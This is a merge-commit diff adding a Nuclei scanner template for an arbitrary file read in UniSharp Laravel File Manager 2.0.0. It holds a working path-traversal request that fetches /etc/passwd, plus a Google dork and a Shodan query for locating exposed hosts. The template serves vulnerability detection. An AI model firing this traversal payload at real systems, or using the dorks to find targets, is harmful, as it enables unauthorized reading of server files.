Merge pull request #3878 from projectdiscovery/unisharp-laravel-file-manager

Create unisharp-laravel-file-manager.yaml

vulnerabilities/other/laravel-filemanager-lfi.yaml

@@ -0,0 +1,28 @@
+id: laravel-filemanager-lfi
+info:
+  name: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
+  author: hackerarpan
+  severity: high
+  reference:
+    - https://www.exploit-db.com/exploits/48166
+    - https://github.com/UniSharp/laravel-filemanager
+  metadata:
+    google-dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
+    shodan-query: http.html:"Laravel FileManager"
+  tags: lfi,unisharp,laravel,filemanager,fileupload,lfr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200